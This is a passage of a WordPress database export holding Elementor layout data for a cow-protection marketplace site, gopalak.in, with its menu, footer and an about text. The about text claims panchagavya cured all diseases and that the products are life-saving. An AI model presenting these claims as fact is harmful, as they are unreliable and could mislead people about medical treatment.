":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12151,1996,'_elementor_page_assets','a:0:{}'),(12153,1997,'_elementor_edit_mode','builder'),(12154,1997,'_elementor_template_type','wp-page'),(12155,1997,'_elementor_version','3.7.8'),(12156,1997,'_wp_page_template','elementor_canvas'),(12157,1997,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d2498f7\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8894245\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7bcdc84\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#111111\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"c55b7c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"a7b8b63\",\"elType\":\"widget\",\"settings\":{\"text\":\"Shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"18acd8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"814f867\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"8ee4602\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"e1e681d\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/aboutus\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"button_text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"2017c69\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"633ac34\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#FFCC2A\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"500\",\"button_text_color\":\"#000000\",\"background_background\":\"gradient\",\"background_color_b\":\"#B87100\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c89a5d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"a0807d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b828571\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\",\"id\":1577,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0caef34\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.<\\/p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung \\/ cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today\\u2019s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise\\/marketing, they are not able to reach people even people want these best products<\\/p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation\\u2019s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold\\u2019s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.<\\/p>\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a8c0b28\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#43693F\"},\"elements\":[{\"id\":\"95efe94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7835249\",\"elType\":\"widget\",\"settings\":{\"social_icon_list\":[{\"social_icon\":{\"value\":\"fab fa-facebook\",\"library\":\"fa-brands\"},\"_id\":\"295676f\",\"item_icon_primary_color\":\"#0F130F\",\"item_icon_secondary_color\":\"#43693F\"},{\"social_icon\":{\"value\":\"fab fa-twitter\",\"library\":\"fa-brands\"},\"_id\":\"d7a6d30\"},{\"social_icon\":{\"value\":\"fab fa-youtube\",\"library\":\"fa-brands\"},\"_id\":\"3f943b8\"},{\"_id\":\"ee4d5ad\",\"social_icon\":{\"value\":\"fab fa-instagram\",\"library\":\"fa-brands\"}}],\"shape\":\"circle\",\"align\":\"left\",\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"social-icons\"},{\"id\":\"4d2132d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6d93d97\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"af65679\",\"elType\":\"widget\",\"settings\":{\"title\":\"Help\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8bf0fa9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Pricing Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/pricing-policy\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"34c6896\",\"elType\":\"widget\",\"settings\":{\"title\":\"Terms & Condition\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/terms-and-conditions\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b99eef9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Privacy Policy\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/privacy-policy-2\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e922c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Refunds\\/Cancellation\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/refunds-cancellation\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a567dd\",\"elType\":\"widget\",\"settings\":{\"title\":\"Vendor Registartion\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/vendor-register\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_font_weight\":\"400\",\"_margin\":{\"unit\":\"px\",\"top\":\"-16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"8033f94\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"5ed7377\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"38dac29\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1b8317a\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Itim\",\"typography_font_weight\":\"400\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cb293a5\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"124a633\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"50353b1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a9 2022\\u00a0<a href=\\\"https:\\/\\/gopalak.in\\/\\\">Gopalak<\\/a>\\u00a0<span class=\\\"powered-by-wordpress\\\">Designed by Homedirect<\\/span><\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(12158,1997,'_elementor_page_assets','a:0:{}'),(12160,1998,'_elementor_edit_mode','builder'),(12161,1998,'_elementor_template_type','wp-page'),(12162,1998,'_elementor_version','3.7.8'),(12163,1998,'_wp_page_template','elementor_canvas'),(12164,1998,'_elementor_data','[{\"id\":\"b112c10\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#43693F\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"1ae7508\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"74e98db\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/cropped-GOPALAK-COIN-2.0.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"56\",\"height\":\"67\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"image\"}